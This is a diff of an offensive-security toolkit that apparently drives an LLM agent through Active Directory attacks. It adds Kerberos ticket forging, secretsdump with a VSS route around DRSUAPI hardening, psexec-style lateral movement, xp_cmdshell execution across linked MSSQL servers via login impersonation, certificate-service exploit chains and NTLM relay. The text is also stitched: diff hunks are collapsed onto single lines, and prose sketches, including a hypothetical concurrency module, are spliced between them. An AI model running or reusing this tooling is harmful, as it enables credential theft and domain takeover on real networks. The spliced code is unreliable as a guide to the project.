+/// is wrong — fail loudly rather than send `password='[TGT]'` to a subprocess.
+pub fn validate_arguments(tool_name: &str, arguments: &Value) -> Result<()> {
+ let Some(obj) = arguments.as_object() else {
+ return Ok(());
+ };
+ for &key in CREDENTIAL_KEYS {
+ if let Some(v) = obj.get(key) {
+ if is_placeholder_value(v) {
+ anyhow::bail!(
+ "tool '{tool_name}' argument '{key}' has placeholder value {v} — \
+ credentials must be resolved from operation state, not invented \
+ by the LLM. Check the worker credential resolver and prompt templates."
+ );
+ }
+ }
+ }
+ Ok(())
+}
+
+fn is_placeholder_value(v: &Value) -> bool {
+ match v {
+ Value::Null => true,
+ Value::String(s) => is_placeholder_str(s),
+ _ => false,
+ }
+}
+
+fn is_placeholder_str(s: &str) -> bool {
+ let t = s.trim();
+ if t.is_empty() {
+ return true;
+ }
+ if (t.starts_with('[') && t.ends_with(']')) || (t.starts_with('<') && t.ends_with('>')) {
+ return true;
+ }
+ let lower = t.to_ascii_lowercase();
+ matches!(
+ lower.as_str(),
+ "n/a"
+ | "na"
+ | "null"
+ | "none"
+ | "nil"
+ | "unknown"
+ | "tbd"
+ | "todo"
+ | "password"
+ | "hash"
+ | "ntlm"
+ | "nthash"
+ | "tgt"
+ | "ticket"
+ | "ccache"
+ | "aes"
+ | "aes_key"
+ | "trust_key"
+ | "domain_sid"
+ | "krbtgt_hash"
+ | "placeholder"
+ // Bracketed forms such as "<password>" or "[hash]" are already
+ // caught by the prefix/suffix check above, and empty strings by
+ // the is_empty check.
+ )
+}
+
 /// Build an impacket-style authentication target string.
 ///
 /// Format: `domain/username:password@target` or `username@target` (for hash auth).
@@ -29,6 +142,15 @@ pub fn hash_args(hash: &str) -> Vec<String> {
 vec!["-hashes".to_string(), h]
 }
 
+/// Extract the NT hash from a hash string that may be in `LM:NT` colon form.
+///
+/// `impacket-ticketer -nthash` rejects the concatenated `LM:NT` form with
+/// `'Odd-length string'` because it expects a 32-char hex NT hash. This helper
+/// returns the right-most colon-delimited segment, trimmed.
+pub fn nt_hash_only(hash: &str) -> &str {
+ hash.rsplit(':').next().unwrap_or(hash).trim()
+}
+
 /// Build netexec-style credential args: `-u user -p pass -d domain` or `-u user -H hash`.
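+///
+/// Illustrative: `netexec_creds(Some("admin"), Some("P@ss"), None, Some("CONTOSO"))`
+/// yields `["-u", "admin", "-p", "P@ss", "-d", "CONTOSO"]`.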
 pub fn netexec_creds(
 username: Option<&str>,
@@ -140,6 +262,33 @@ mod tests {
 assert_eq!(args, vec!["-hashes", "aad3b435:aabbccdd"]);
 }
 
+ #[test]
+ fn nt_hash_only_strips_lm_half() {
+ assert_eq!(
+ nt_hash_only("aad3b435b51404eeaad3b435b51404ee:d350c5900e26d2c95f501e94cf95b078"),
+ "d350c5900e26d2c95f501e94cf95b078"
+ );
+ }
+
+ #[test]
+ fn nt_hash_only_passes_through_plain_nt() {
+ assert_eq!(
+ nt_hash_only("d350c5900e26d2c95f501e94cf95b078"),
+ "d350c5900e26d2c95f501e94cf95b078"
+ );
+ }
+
+ #[test]
+ fn nt_hash_only_trims_whitespace() {
+ assert_eq!(nt_hash_only(" abcd "), "abcd");
+ assert_eq!(nt_hash_only("aad3b435:abcd\n"), "abcd");
+ }
+
+ #[test]
+ fn nt_hash_only_empty_string() {
+ assert_eq!(nt_hash_only(""), "");
+ }
+
 #[test]
 fn netexec_creds_password_auth() {
 let args = netexec_creds(Some("admin"), Some("P@ss"), None, Some("CONTOSO"));
@@ -230,4 +379,85 @@ mod tests {
 assert_eq!(key, "KRB5CCNAME");
 assert_eq!(val, "/tmp/krb5cc_admin");
 }
+
+ #[test]
+ fn validate_arguments_passes_real_credentials() {
+ let args = serde_json::json!({
+ "target": "192.168.58.10",
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "hash": "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0",
+ "krbtgt_hash": "aad3b435b51404eeaad3b435b51404ee",
+ "ticket_path": "/tmp/admin.ccache",
+ "domain_sid": "S-1-5-21-1234-5678-9012",
+ });
+ validate_arguments("secretsdump", &args).expect("real values must pass");
+ }
+
+ #[test]
+ fn validate_arguments_rejects_bracketed_placeholder() {
+ let args = serde_json::json!({
+ "target": "dc01",
+ "password": "[TGT]",
+ });
+ let err = validate_arguments("nmap_scan", &args).unwrap_err();
+ let msg = err.to_string();
+ assert!(msg.contains("password"), "{msg}");
+ assert!(msg.contains("[TGT]"), "{msg}");
+ assert!(msg.contains("nmap_scan"), "{msg}");
+ }
+
+ #[test]
+ fn validate_arguments_rejects_angle_placeholder() {
+ let args = serde_json::json!({
+ "hash": "<NT_HASH>",
+ });
+ let err = validate_arguments("generate_golden_ticket", &args).unwrap_err();
+ assert!(err.to_string().contains("hash"));
+ }
+
+ #[test]
+ fn validate_arguments_rejects_n_a_string() {
+ let args = serde_json::json!({"password": "N/A"});
+ assert!(validate_arguments("psexec", &args).is_err());
+ }
+
+ #[test]
+ fn validate_arguments_rejects_null_value() {
+ let args = serde_json::json!({"trust_key": null});
+ assert!(validate_arguments("create_inter_realm_ticket", &args).is_err());
+ }
+
+ #[test]
+ fn validate_arguments_rejects_bare_word_placeholder() {
+ let args = serde_json::json!({"krbtgt_hash": "HASH"});
+ assert!(validate_arguments("generate_golden_ticket", &args).is_err());
+ }
+
+ #[test]
+ fn validate_arguments_rejects_empty_string() {
+ let args = serde_json::json!({"password": ""});
+ assert!(validate_arguments("psexec", &args).is_err());
+ }
+
+ #[test]
+ fn validate_arguments_ignores_non_credential_keys() {
+ let args = serde_json::json!({
+ "target": "<target>",
+ "command": "[whoami]",
+ });
+ validate_arguments("psexec", &args).expect("non-credential keys are not validated");
+ }
+
+ #[test]
+ fn validate_arguments_handles_non_object_arguments() {
+ let args = serde_json::json!("just a string");
+ validate_arguments("any_tool", &args).expect("non-object arguments pass through");
+ }
+
+ #[test]
+ fn validate_arguments_handles_missing_credential_keys() {
+ let args = serde_json::json!({"target": "192.168.58.10"});
+ validate_arguments("nmap_scan", &args).expect("absent keys are not validated");
+ }
+}
diff --git a/ares-tools/src/executor.rs b/ares-tools/src/executor.rs
index 2cb3ff50..6ea89c77 100644 --- a/ares-tools/src/executor.rs +++ b/ares-tools/src/executor.rs @@ -15,6 +15,7 @@ pub struct CommandBuilder { env_vars: Vec<(String, String)>, timeout: Duration, stdin_data: Option<String>, + cwd: Option<String>, } impl CommandBuilder { @@ -25,6 +26,7 @@ impl CommandBuilder { env_vars: Vec::new(), timeout: DEFAULT_TIMEOUT, stdin_data: None, + cwd: None, } } @@ -79,6 +81,11 @@ impl CommandBuilder { self } + pub fn current_dir(mut self, dir: impl Into<String>) -> Self { + self.cwd = Some(dir.into()); + self + } + pub async fn execute(self) -> Result<ToolOutput> { #[cfg(test)] { @@ -93,6 +100,10 @@ let mut cmd = Command::new(&self.program); cmd.args(&self.args); + if let Some(ref dir) = self.cwd { + cmd.current_dir(dir); + } + for (key, value) in &self.env_vars { cmd.env(key, value); } diff --git a/ares-tools/src/lateral/execution.rs b/ares-tools/src/lateral/execution.rs index 3e586d64..183d3dae 100644 --- a/ares-tools/src/lateral/execution.rs +++ b/ares-tools/src/lateral/execution.rs @@ -9,6 +9,29 @@ use crate::credentials; use crate::executor::CommandBuilder; use crate::ToolOutput; +/// Reject calls that would land impacket in an interactive `getpass()` prompt. +/// Without password or hash, impacket asks the controlling TTY for a password +/// and crashes with EOFError when run from a non-interactive worker. +fn require_password_or_hash( + tool: &str, + username: &str, + domain: Option<&str>, + password: Option<&str>, + hash: Option<&str>, +) -> Result<()> { + if password.is_none() && hash.is_none() { + anyhow::bail!( + "{tool} requires a password or hash for {username}@{} but none was \ + supplied. Credentials must be present in operation state for the \ + (username, domain) pair so the resolver can inject them, or the \ + LLM must call the *_kerberos variant with a valid ticket. Refusing \ + to run because impacket would call getpass() and crash on no-TTY.", + domain.unwrap_or("(no domain)") + ); + } + Ok(()) +} + /// Execute a command on a remote host via impacket-psexec. /// /// Required args: `target`, `username` @@ -22,6 +45,8 @@ pub async fn psexec(args: &Value) -> Result<ToolOutput> { let command = optional_str(args, "command").unwrap_or(r#"cmd.exe /c "whoami && hostname && ipconfig""#); + require_password_or_hash("psexec", username, domain, password, hash)?; + let (auth_str, extra_args) = credentials::impacket_auth(domain, username, password, hash, target); @@ -76,6 +101,8 @@ pub async fn wmiexec(args: &Value) -> Result<ToolOutput> { let domain = optional_str(args, "domain"); let command = optional_str(args, "command").unwrap_or("whoami"); + require_password_or_hash("wmiexec", username, domain, password, hash)?; + let (auth_str, extra_args) = credentials::impacket_auth(domain, username, password, hash, target); @@ -129,6 +156,8 @@ pub async fn smbexec(args: &Value) -> Result<ToolOutput> { let domain = optional_str(args, "domain"); let command = optional_str(args, "command").unwrap_or("whoami"); + require_password_or_hash("smbexec", username, domain, password, hash)?; + let (auth_str, extra_args) = credentials::impacket_auth(domain, username, password, hash, target); @@ -225,6 +254,7 @@ pub async fn xfreerdp(args: &Value) -> Result<ToolOutput> { cmd.arg("/cert-ignore") .arg("+auth-only") + .env("HOME", "/root") .timeout_secs(30) .execute() .await @@ -260,7 +290,9 @@ pub async fn ssh_with_password(args: &Value) -> Result<ToolOutput> {
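A sketch of the builder with the new `current_dir` in play (program, arguments, paths, and timeout are illustrative; the chained methods are the ones defined in this file):

```rust
// Sketch: CommandBuilder usage with the new current_dir() step.
let out = CommandBuilder::new("bloodhound-python")
    .arg("-c")
    .arg("All")
    .current_dir("/tmp/bh_output") // new: collection artifacts land here
    .env("HOME", "/root")
    .timeout_secs(600)
    .execute()
    .await?;
```

/// Dump secrets from a remote host via impacket-secretsdump with Kerberos auth.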
/// /// Required args: `target`, `username`, `domain`, `ticket_path` -/// Optional args: `dc_ip`, `target_ip`, `timeout_minutes` +/// Optional args: `dc_ip`, `target_ip`, `timeout_minutes`, +/// `just_dc_user` (single account, e.g. `krbtgt`), +/// `use_vss` (bool — use VSS method to bypass DRSUAPI hardening) pub async fn secretsdump_kerberos(args: &Value) -> Result<ToolOutput> { let target = required_str(args, "target")?; let username = required_str(args, "username")?; @@ -268,22 +300,28 @@ pub async fn secretsdump_kerberos(args: &Value) -> Result<ToolOutput> { let ticket_path = required_str(args, "ticket_path")?; let dc_ip = optional_str(args, "dc_ip"); let target_ip = optional_str(args, "target_ip"); + let just_dc_user = optional_str(args, "just_dc_user"); + let use_vss = crate::args::optional_bool(args, "use_vss").unwrap_or(false); let timeout_minutes = optional_i64(args, "timeout_minutes").unwrap_or(3); let timeout_secs = (timeout_minutes * 60) as u64; let target_str = format!("{domain}/{username}@{target}"); let (env_key, env_val) = credentials::kerberos_env(ticket_path); - CommandBuilder::new("impacket-secretsdump") + let mut cmd = CommandBuilder::new("impacket-secretsdump") .arg("-k") .arg("-no-pass") .arg(&target_str) .flag_opt("-dc-ip", dc_ip) .flag_opt("-target-ip", target_ip) - .env(env_key, env_val) - .timeout_secs(timeout_secs) - .execute() - .await + .flag_opt("-just-dc-user", just_dc_user) + .env(env_key, env_val); + + if use_vss { + cmd = cmd.arg("-use-vss"); + } + + cmd.timeout_secs(timeout_secs).execute().await } #[cfg(test)] @@ -292,6 +330,8 @@ mod tests { use crate::credentials; use serde_json::json; + // --- psexec --- + #[test] fn psexec_requires_target() { let args = json!({"username": "admin"}); @@ -358,6 +398,8 @@ mod tests { assert_eq!(extra_args, vec!["-hashes", ":aabbccdd"]); } + // --- psexec_kerberos --- + #[test] fn psexec_kerberos_target_format() { let args = json!({ @@ -432,6 +474,8 @@ mod tests { assert_eq!(optional_str(&args, "dc_ip"), Some("192.168.58.1")); } + // --- wmiexec --- + #[test] fn wmiexec_requires_target() { let args = json!({"username": "admin"}); @@ -451,6 +495,8 @@ mod tests { assert_eq!(command, "whoami"); } + // --- wmiexec_kerberos --- + #[test] fn wmiexec_kerberos_target_format() { let domain = "contoso.local"; @@ -472,6 +518,8 @@ mod tests { assert_eq!(command, "whoami"); } + // --- smbexec --- + #[test] fn smbexec_requires_target() { let args = json!({"username": "admin"}); @@ -491,6 +539,8 @@ mod tests { assert_eq!(command, "whoami"); } + // --- smbexec_kerberos --- + #[test] fn smbexec_kerberos_target_format() { let domain = "north.contoso.local"; @@ -503,6 +553,8 @@ mod tests { ); } + // --- evil_winrm --- + #[test] fn evil_winrm_default_command() { let args = json!({"target": "192.168.58.1", "username": "admin"}); @@ -571,6 +623,8 @@ mod tests { assert!(used_flag.is_empty()); } + // --- xfreerdp --- + #[test] fn xfreerdp_target_format() { let target = "192.168.58.1"; @@ -621,6 +675,8 @@ mod tests { assert_eq!(auth_arg, "/pth:aabbccdd"); } + // --- ssh_with_password --- + #[test] fn ssh_user_host_format() { let username = "root"; @@ -667,6 +723,8 @@ mod tests { assert!(optional_str(&args, "port").is_none()); } + // --- secretsdump_kerberos --- + #[test] fn secretsdump_kerberos_target_format() { let domain = "contoso.local"; @@ -725,6 +783,8 @@ mod tests { assert!(required_str(&args, "ticket_path").is_err()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lateral/kerberos.rs
b/ares-tools/src/lateral/kerberos.rs index 5b042ea7..7a1cc884 100644 --- a/ares-tools/src/lateral/kerberos.rs +++ b/ares-tools/src/lateral/kerberos.rs @@ -123,6 +123,8 @@ mod tests { assert!(optional_str(&args, "dc_ip").is_none()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lateral/mssql.rs b/ares-tools/src/lateral/mssql.rs index bc6a9113..9f8e0bb6 100644 --- a/ares-tools/src/lateral/mssql.rs +++ b/ares-tools/src/lateral/mssql.rs @@ -98,15 +98,32 @@ pub async fn mssql_enum_linked_servers(args: &Value) -> Result<ToolOutput> { mssql_query(mssql_from_args(args)?, "EXEC sp_linkedservers;").await } +/// Wrap `inner_query` in a source-side `EXECUTE AS LOGIN` if requested. +/// +/// Cross-forest linked-server hops fail when the connecting principal can't +/// double-hop (Kerberos delegation/SID filtering). Two source-side workarounds: +/// - `EXECUTE AS LOGIN = 'sa'; <hop>` — runs the hop under sa's mapped login +/// (requires SeImpersonatePrivilege or IMPERSONATE on the target login) +/// - `SELECT * FROM OPENQUERY(...)` — uses the linked-server's configured +/// `sp_addlinkedsrvlogin` mapping (separate path: see `mssql_openquery`) +fn wrap_execute_as(inner_query: &str, impersonate_user: Option<&str>) -> String { + match impersonate_user { + Some(user) => format!("EXECUTE AS LOGIN = '{user}'; {inner_query}"), + None => inner_query.to_string(), + } +} + /// Execute a query on a linked MSSQL server. /// /// Required args: `target`, `username`, `linked_server`, `query` -/// Optional args: `password`, `domain`, `windows_auth` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` pub async fn mssql_exec_linked(args: &Value) -> Result<ToolOutput> { let linked_server = required_str(args, "linked_server")?; let query = required_str(args, "query")?; + let impersonate_user = optional_str(args, "impersonate_user"); - let full_query = format!("EXEC ('{query}') AT [{linked_server}];"); + let hop = format!("EXEC ('{query}') AT [{linked_server}];"); + let full_query = wrap_execute_as(&hop, impersonate_user); mssql_query(mssql_from_args(args)?, &full_query).await } @@ -114,14 +131,16 @@ pub async fn mssql_exec_linked(args: &Value) -> Result<ToolOutput> { /// Enable xp_cmdshell on a linked MSSQL server. /// /// Required args: `target`, `username`, `linked_server` -/// Optional args: `password`, `domain`, `windows_auth` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` pub async fn mssql_linked_enable_xpcmdshell(args: &Value) -> Result<ToolOutput> { let linked_server = required_str(args, "linked_server")?; + let impersonate_user = optional_str(args, "impersonate_user"); - let full_query = format!( + let hop = format!( "EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; \ EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [{linked_server}];" ); + let full_query = wrap_execute_as(&hop, impersonate_user); mssql_query(mssql_from_args(args)?, &full_query).await } @@ -129,12 +148,35 @@ pub async fn mssql_linked_enable_xpcmdshell(args: &Value) -> Result<ToolOutput> /// Execute a command via xp_cmdshell on a linked MSSQL server.
/// /// Required args: `target`, `username`, `linked_server`, `command` -/// Optional args: `password`, `domain`, `windows_auth` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` pub async fn mssql_linked_xpcmdshell(args: &Value) -> Result<ToolOutput> { let linked_server = required_str(args, "linked_server")?; let command = required_str(args, "command")?; + let impersonate_user = optional_str(args, "impersonate_user"); + + let hop = format!("EXEC ('xp_cmdshell ''{command}''') AT [{linked_server}];"); + let full_query = wrap_execute_as(&hop, impersonate_user); + + mssql_query(mssql_from_args(args)?, &full_query).await +} - let full_query = format!("EXEC ('xp_cmdshell ''{command}''') AT [{linked_server}];"); +/// Query a linked MSSQL server via OPENQUERY using the linked server's +/// configured remote login (sp_addlinkedsrvlogin) — bypasses Kerberos +/// double-hop. This is the cross-forest pivot path when the connecting +/// principal cannot delegate but the linked server has an explicit login +/// mapping (e.g. `RPC OUT = ON` plus a stored credential). +/// +/// Required args: `target`, `username`, `linked_server`, `query` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` +pub async fn mssql_openquery(args: &Value) -> Result<ToolOutput> { + let linked_server = required_str(args, "linked_server")?; + let query = required_str(args, "query")?; + let impersonate_user = optional_str(args, "impersonate_user"); + + // OPENQUERY's inner string uses single quotes; double any embedded ones. + let escaped = query.replace('\'', "''"); + let openq = format!("SELECT * FROM OPENQUERY([{linked_server}], '{escaped}');"); + let full_query = wrap_execute_as(&openq, impersonate_user); mssql_query(mssql_from_args(args)?, &full_query).await } @@ -157,6 +199,8 @@ mod tests { use crate::credentials; use serde_json::json; + // --- mssql_from_args required fields --- + #[test] fn mssql_requires_target() { let args = json!({"username": "sa"}); @@ -187,6 +231,8 @@ mod tests { assert!(windows_auth); } + // --- mssql_base auth string via impacket_target --- + #[test] fn mssql_auth_string_with_domain_and_password() { let auth_str = @@ -206,12 +252,16 @@ mod tests { assert_eq!(auth_str, "CONTOSO/sa@192.168.58.1"); } + // --- mssql_command --- + #[test] fn mssql_command_requires_command() { let args = json!({"target": "192.168.58.1", "username": "sa"}); assert!(required_str(&args, "command").is_err()); } + // --- mssql_enable_xp_cmdshell --- + #[test] fn enable_xp_cmdshell_impersonate_query_format() { let user = "sa"; @@ -240,6 +290,8 @@ mod tests { assert!(!query.starts_with("EXECUTE AS LOGIN")); } + // --- mssql_impersonate --- + #[test] fn impersonate_query_format() { let impersonate_user = "sa"; @@ -268,6 +320,8 @@ mod tests { assert!(required_str(&args, "query").is_err()); } + // --- mssql_exec_linked --- + #[test] fn linked_server_query_format() { let linked_server = "SQL02"; @@ -296,6 +350,8 @@ mod tests { assert!(required_str(&args, "query").is_err()); } + // --- mssql_linked_enable_xpcmdshell --- + #[test] fn linked_enable_xpcmdshell_format() { let linked_server = "SQL02"; @@ -307,6 +363,8 @@ mod tests { assert!(full_query.contains("xp_cmdshell")); } + // --- mssql_linked_xpcmdshell --- + #[test] fn linked_xpcmdshell_format() { let linked_server = "SQL02"; @@ -325,6 +383,8 @@ mod tests { assert!(required_str(&args, "command").is_err()); } + // --- mssql_ntlm_coerce --- + #[test] fn ntlm_coerce_xp_dirtree_format() { let listener_ip = "192.168.58.5";
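To make the two pivot paths concrete, a test-style sketch of the SQL each helper above produces (server and login names are illustrative; `wrap_execute_as` and the OPENQUERY escaping are the ones defined above):

```rust
// Sketch: SQL strings produced by the linked-server helpers.
let hop = format!("EXEC ('whoami') AT [{}];", "SQL02");
assert_eq!(
    wrap_execute_as(&hop, Some("sa")),
    "EXECUTE AS LOGIN = 'sa'; EXEC ('whoami') AT [SQL02];"
);

// OPENQUERY path: embedded single quotes are doubled before interpolation.
let inner = "SELECT name FROM sys.server_principals WHERE type = 'S'";
let escaped = inner.replace('\'', "''");
assert_eq!(
    format!("SELECT * FROM OPENQUERY([SQL02], '{escaped}');"),
    "SELECT * FROM OPENQUERY([SQL02], 'SELECT name FROM sys.server_principals WHERE type = ''S''');"
);
```

@@ -344,6 +404,8 @@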
assert!(required_str(&args, "listener_ip").is_err()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lateral/pth.rs b/ares-tools/src/lateral/pth.rs index 1d251bd3..0a89a787 100644 --- a/ares-tools/src/lateral/pth.rs +++ b/ares-tools/src/lateral/pth.rs @@ -110,6 +110,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- pth_cred_string --- + #[test] fn cred_string_with_domain() { let result = pth_cred_string(Some("CONTOSO"), "admin", "aabbccdd"); @@ -128,6 +130,8 @@ mod tests { assert_eq!(result, "admin%aabbccdd"); } + // --- pth_winexe --- + #[test] fn pth_winexe_requires_target() { let args = json!({"username": "admin", "hash": "aabbccdd"}); @@ -159,6 +163,8 @@ mod tests { assert_eq!(format!("//{target}"), "//192.168.58.1"); } + // --- pth_smbclient --- + #[test] fn pth_smbclient_default_share() { let args = json!({"target": "192.168.58.1", "username": "admin", "hash": "aa"}); @@ -192,6 +198,8 @@ mod tests { assert_eq!(format!("//{target}/{share}"), "//192.168.58.1/C$"); } + // --- pth_rpcclient --- + #[test] fn pth_rpcclient_default_command() { let args = json!({"target": "192.168.58.1", "username": "admin", "hash": "aa"}); @@ -199,6 +207,8 @@ mod tests { assert_eq!(command, "getusername"); } + // --- pth_wmic --- + #[test] fn pth_wmic_default_query() { let args = json!({"target": "192.168.58.1", "username": "admin", "hash": "aa"}); @@ -239,6 +249,8 @@ mod tests { assert_eq!(cred, "CONTOSO/admin%aad3b435:aabbccdd"); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lib.rs b/ares-tools/src/lib.rs index 46f90016..52736faf 100644 --- a/ares-tools/src/lib.rs +++ b/ares-tools/src/lib.rs @@ -9,6 +9,7 @@ pub mod args; #[cfg(feature = "blue")] pub mod blue; pub mod coercion; +pub mod concurrency; pub mod cracker; pub mod credential_access; pub mod credentials; @@ -64,7 +65,24 @@ impl ToolOutput { /// Dispatch a tool call by name, executing the corresponding CLI command. /// /// Returns the tool output or an error if the tool is unknown or execution fails. +/// +/// Validates that no credential argument carries a placeholder value before +/// dispatching — a defense-in-depth backstop for the worker credential +/// resolver that catches anything missed upstream (schema strip, prompt +/// sanitization, worker resolver). See [`credentials::validate_arguments`]. pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result<ToolOutput> { + credentials::validate_arguments(tool_name, arguments)?; + + // Cap concurrent spider_plus dispatches process-wide to prevent the + // netexec fork-storm OOM observed on EC2 (bug_orch_oom_spider_plus.md). + // The permit is held for the duration of the tool execution and dropped + // when this function returns.
+ let _spider_permit = if concurrency::is_spider_plus_tool(tool_name) { + Some(concurrency::acquire_spider_plus_permit().await) + } else { + None + }; + match tool_name { // ── Reconnaissance ────────────────────────────────────────── "nmap_scan" => recon::nmap_scan(arguments).await, @@ -83,6 +101,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result<ToolOutput> "adidnsdump" => recon::adidnsdump(arguments).await, "save_users_to_file" => recon::save_users_to_file(arguments).await, "smbclient_kerberos_shares" => recon::smbclient_kerberos_shares(arguments).await, + "ldap_acl_enumeration" => recon::ldap_acl_enumeration(arguments).await, // ── Credential Access ─────────────────────────────────────── "kerberoast" => credential_access::kerberoast(arguments).await, @@ -92,6 +111,7 @@ } "secretsdump" => credential_access::secretsdump(arguments).await, "lsassy" => credential_access::lsassy(arguments).await, + "smb_login_check" => credential_access::smb_login_check(arguments).await, "domain_admin_checker" => credential_access::domain_admin_checker(arguments).await, "gpp_password_finder" => credential_access::gpp_password_finder(arguments).await, "sysvol_script_search" => credential_access::sysvol_script_search(arguments).await, @@ -135,6 +155,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result<ToolOutput> lateral::mssql_linked_enable_xpcmdshell(arguments).await } "mssql_linked_xpcmdshell" => lateral::mssql_linked_xpcmdshell(arguments).await, + "mssql_openquery" => lateral::mssql_openquery(arguments).await, "mssql_ntlm_coerce" => lateral::mssql_ntlm_coerce(arguments).await, // ── Privilege Escalation ──────────────────────────────────── @@ -144,6 +165,11 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result<ToolOutput> "certipy_shadow" => privesc::certipy_shadow(arguments).await, "certipy_template_esc4" => privesc::certipy_template_esc4(arguments).await, "certipy_esc4_full_chain" => privesc::certipy_esc4_full_chain(arguments).await, + "certipy_ca" => privesc::certipy_ca(arguments).await, + "certipy_forge" => privesc::certipy_forge(arguments).await, + "certipy_retrieve" => privesc::certipy_retrieve(arguments).await, + "certipy_esc7_full_chain" => privesc::certipy_esc7_full_chain(arguments).await, + "certipy_relay" => privesc::certipy_relay(arguments).await, "find_delegation" => privesc::find_delegation(arguments).await, "s4u_attack" => privesc::s4u_attack(arguments).await, "generate_golden_ticket" => privesc::generate_golden_ticket(arguments).await, @@ -154,6 +180,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result<ToolOutput> "raise_child" => privesc::raise_child(arguments).await, "extract_trust_key" => privesc::extract_trust_key(arguments).await, "create_inter_realm_ticket" => privesc::create_inter_realm_ticket(arguments).await, + "forge_inter_realm_and_dump" => privesc::forge_inter_realm_and_dump(arguments).await, "get_sid" => privesc::get_sid(arguments).await, "dnstool" => privesc::dnstool(arguments).await, "gmsa_dump_passwords" => privesc::gmsa_dump_passwords(arguments).await, @@ -187,6 +214,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result<ToolOutput> "ntlmrelayx_to_adcs" => coercion::ntlmrelayx_to_adcs(arguments).await, "ntlmrelayx_to_smb" => coercion::ntlmrelayx_to_smb(arguments).await, "ntlmrelayx_multirelay" => coercion::ntlmrelayx_multirelay(arguments).await, + "relay_and_coerce" => coercion::relay_and_coerce(arguments).await, _ => Err(anyhow::anyhow!("unknown tool: {tool_name}")), }
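The `concurrency` module itself is not shown in this diff. A minimal sketch of what the permit gate could look like, assuming tokio's `Semaphore` and an illustrative cap of 2 (only the two function names come from the dispatch call site above):

```rust
// Hypothetical ares-tools/src/concurrency.rs — a sketch, not the actual module.
use std::sync::LazyLock;
use tokio::sync::{Semaphore, SemaphorePermit};

// Illustrative cap: at most 2 spider_plus subprocesses at once.
static SPIDER_PLUS_SEMAPHORE: LazyLock<Semaphore> = LazyLock::new(|| Semaphore::new(2));

pub fn is_spider_plus_tool(tool_name: &str) -> bool {
    // Illustrative predicate; the real mapping may cover aliases.
    tool_name == "spider_plus"
}

pub async fn acquire_spider_plus_permit() -> SemaphorePermit<'static> {
    SPIDER_PLUS_SEMAPHORE
        .acquire()
        .await
        .expect("spider_plus semaphore is never closed")
}
```

Because the permit is an RAII guard, dropping `_spider_permit` when `dispatch` returns releases the slot on success and error paths alike.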
diff --git a/ares-tools/src/parsers/certipy.rs b/ares-tools/src/parsers/certipy.rs index 724f8e90..80f1ab0b 100644 --- a/ares-tools/src/parsers/certipy.rs +++ b/ares-tools/src/parsers/certipy.rs @@ -9,11 +9,22 @@ const ESC_TYPES: &[&str] = &[ ]; pub fn parse_certipy_find(output: &str, params: &Value) -> Vec<Value> { - let target_ip = params - .get("target") - .or_else(|| params.get("target_ip")) + // ca_host_ip is the ADCS CA server IP (where certs are enrolled). + // target/target_ip is the DC IP used for LDAP queries. + // For vuln target, prefer ca_host_ip so exploitation targets the CA, not the DC. + let ca_host_ip = params + .get("ca_host_ip") .and_then(|v| v.as_str()) .unwrap_or(""); + let target_ip = if !ca_host_ip.is_empty() { + ca_host_ip + } else { + params + .get("target") + .or_else(|| params.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or("") + }; let domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); @@ -29,18 +40,24 @@ // Strategy 2: Look for "ESCn :" patterns (certipy find -vulnerable output) // These appear as "ESC1 : 'DOMAIN\\Group' can enroll..." for esc_type in ESC_TYPES { + let esc_upper = esc_type.to_uppercase(); let found = if has_vuln_header { - // Standard certipy output with vulnerability section - output_lower.contains(esc_type) + // Use word-boundary-aware matching to avoid false positives + // (e.g. "esc1" matching inside "esc13" or "esc15"). + // Certipy outputs "ESCn :" or "ESCn:" patterns. + output.contains(&format!("{esc_upper} :")) + || output.contains(&format!("{esc_upper}:")) + || output.contains(&format!("{esc_upper} ")) + || esc_word_boundary_match(&output_lower, esc_type) } else { // Also detect ESC patterns without the header — certipy sometimes // outputs vulnerability info inline with template details. // Look for "ESCn" followed by ":" or "vulnerability" on the same or // nearby lines. - let esc_upper = esc_type.to_uppercase(); output.contains(&format!("{esc_upper} :")) || output.contains(&format!("{esc_upper}:")) - || (output_lower.contains(esc_type) && output_lower.contains("vulnerab")) + || (esc_word_boundary_match(&output_lower, esc_type) + && output_lower.contains("vulnerab")) }; if found { @@ -59,6 +76,9 @@ pub fn parse_certipy_find(output: &str, params: &Value) -> Vec<Value> { if let Some(ref tmpl) = template_name { details["template_name"] = json!(tmpl); } + if !ca_host_ip.is_empty() { + details["ca_host"] = json!(ca_host_ip); + } vulns.push(json!({ "vuln_id": format!("adcs_{}_{}", esc_type, target_ip), @@ -75,6 +95,23 @@ pub fn parse_certipy_find(output: &str, params: &Value) -> Vec<Value> { vulns } +/// Check if `esc_type` (e.g. "esc1") appears as a whole word in `text`. +/// Prevents "esc1" from matching inside "esc13" or "esc15". +fn esc_word_boundary_match(text: &str, esc_type: &str) -> bool { + let mut start = 0; + while let Some(pos) = text[start..].find(esc_type) { + let abs_pos = start + pos; + let end_pos = abs_pos + esc_type.len(); + // Check that the character after the match is not a digit + let after_ok = end_pos >= text.len() || !text.as_bytes()[end_pos].is_ascii_digit(); + if after_ok { + return true; + } + start = abs_pos + 1; + } + false +} + /// Extract CA name from certipy output. fn extract_ca_name(output: &str) -> Option<String> { for line in output.lines() { @@ -117,12 